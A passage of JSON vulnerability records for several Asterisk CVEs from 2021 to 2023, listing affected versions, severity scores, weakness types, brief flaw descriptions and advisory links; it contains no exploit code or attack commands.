"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"name": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"name": "http://downloads.asterisk.org/pub/security/AST-2021-007.html",
"refsource": "MISC",
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29381",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"name": "https://downloads.digium.com/pub/security/AST-2021-007.html",
"refsource": "MISC",
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-31878",
"datePublished": "2021-07-27T05:17:05.000Z",
"dateReserved": "2021-04-29T00:00:00.000Z",
"dateUpdated": "2024-08-03T23:10:30.837Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-26713 (GCVE-0-2021-26713)
Vulnerability from nvd – Published: 2021-02-19 19:30 – Updated: 2024-08-03 20:33- n/a
| URL | Tags |
|---|---|
| https://downloads.asterisk.org/pub/security/ | x_refsource_MISC |
| https://downloads.asterisk.org/pub/security/AST-2… | x_refsource_MISC |
| https://issues.asterisk.org/jira/browse/ASTERISK-29205 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:33:40.660Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-19T19:30:30.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-26713",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://downloads.asterisk.org/pub/security/",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-004.html",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29205",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-26713",
"datePublished": "2021-02-19T19:30:30.000Z",
"dateReserved": "2021-02-05T00:00:00.000Z",
"dateUpdated": "2024-08-03T20:33:40.660Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-49786 (GCVE-0-2023-49786)
Vulnerability from cvelistv5 – Published: 2023-12-14 19:47 – Updated: 2025-02-13 17:18- CWE-703 - Improper Check or Handling of Exceptional Conditions
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:01:25.997Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-49786",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-08T14:19:55.907894Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-08T14:20:19.222Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-703",
"description": "CWE-703: Improper Check or Handling of Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:18.647Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-hxj9-xwr8-w8pq",
"discovery": "UNKNOWN"
},
"title": "Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49786",
"datePublished": "2023-12-14T19:47:46.306Z",
"dateReserved": "2023-11-30T13:39:50.862Z",
"dateUpdated": "2025-02-13T17:18:55.224Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-37457 (GCVE-0-2023-37457)
Vulnerability from cvelistv5 – Published: 2023-12-14 19:43 – Updated: 2025-02-13 17:01- CWE-120 - Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
| URL | Tags |
|---|---|
| https://github.com/asterisk/asterisk/security/adv… | x_refsource_CONFIRM |
| https://github.com/asterisk/asterisk/commit/a1ca0… | x_refsource_MISC |
| https://lists.debian.org/debian-lts-announce/2023… |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:16:30.273Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c= 18.20.0"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c= 20.5.0"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c= 18.9-cert5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:20.393Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"name": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-98rc-4j27-74hh",
"discovery": "UNKNOWN"
},
"title": "Asterisk\u0027s PJSIP_HEADER dialplan function can overwrite memory/cause crash when using \u0027update\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-37457",
"datePublished": "2023-12-14T19:43:30.945Z",
"dateReserved": "2023-07-06T13:01:36.996Z",
"dateUpdated": "2025-02-13T17:01:26.636Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-49294 (GCVE-0-2023-49294)
Vulnerability from cvelistv5 – Published: 2023-12-14 19:40 – Updated: 2025-02-13 17:18- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
| URL | Tags |
|---|---|
| https://github.com/asterisk/asterisk/security/adv… | x_refsource_CONFIRM |
| https://github.com/asterisk/asterisk/commit/424be… | x_refsource_MISC |
| https://github.com/asterisk/asterisk/blob/master/… | x_refsource_MISC |
| https://lists.debian.org/debian-lts-announce/2023… |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T21:53:45.375Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "asterisk",
"vendor": "asterisk",
"versions": [
{
"status": "affected",
"version": "\u003c 18.20.1"
},
{
"status": "affected",
"version": "\u003e= 19.0.0, \u003c 20.5.1"
},
{
"status": "affected",
"version": "= 21.0.0"
},
{
"status": "affected",
"version": "\u003c 18.9-cert6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-29T00:06:21.896Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"name": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"name": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"source": {
"advisory": "GHSA-8857-hfmw-vg8f",
"discovery": "UNKNOWN"
},
"title": "Asterisk Path Traversal vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-49294",
"datePublished": "2023-12-14T19:40:46.157Z",
"dateReserved": "2023-11-24T16:45:24.314Z",
"dateUpdated": "2025-02-13T17:18:40.277Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-46837 (GCVE-0-2021-46837)
Vulnerability from cvelistv5 – Published: 2022-08-30 00:00 – Updated: 2024-08-04 05:17- n/a
| URL | Tags |
|---|---|
| https://downloads.asterisk.org/pub/security/AST-2… | |
| https://lists.debian.org/debian-lts-announce/2022… | mailing-list |
| https://www.debian.org/security/2022/dsa-5285 | vendor-advisory |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:17:42.455Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/AST-2021-006.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-46837",
"datePublished": "2022-08-30T00:00:00.000Z",
"dateReserved": "2022-08-30T00:00:00.000Z",
"dateUpdated": "2024-08-04T05:17:42.455Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26651 (GCVE-0-2022-26651)
Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:11- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:11:43.391Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x and Certified Asterisk through 16.8-cert13. The func_odbc module provides possibly inadequate escaping functionality for backslash characters in SQL queries, resulting in user-provided data creating a broken SQL query or possibly a SQL injection. This is fixed in 16.25.2, 18.11.2, and 19.3.2, and 16.8-cert14."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-11-18T00:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-003.html"
},
{
"url": "http://packetstormsecurity.com/files/166746/Asterisk-Project-Security-Advisory-AST-2022-003.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26651",
"datePublished": "2022-04-15T00:00:00.000Z",
"dateReserved": "2022-03-07T00:00:00.000Z",
"dateUpdated": "2024-08-03T05:11:43.391Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26498 (GCVE-0-2022-26498)
Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.984Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-04T00:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26498",
"datePublished": "2022-04-15T00:00:00.000Z",
"dateReserved": "2022-03-06T00:00:00.000Z",
"dateUpdated": "2024-08-03T05:03:32.984Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-26499 (GCVE-0-2022-26499)
Vulnerability from cvelistv5 – Published: 2022-04-15 00:00 – Updated: 2024-08-03 05:03- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T05:03:32.912Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2022-002.html"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/166745/Asterisk-Project-Security-Advisory-AST-2022-002.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
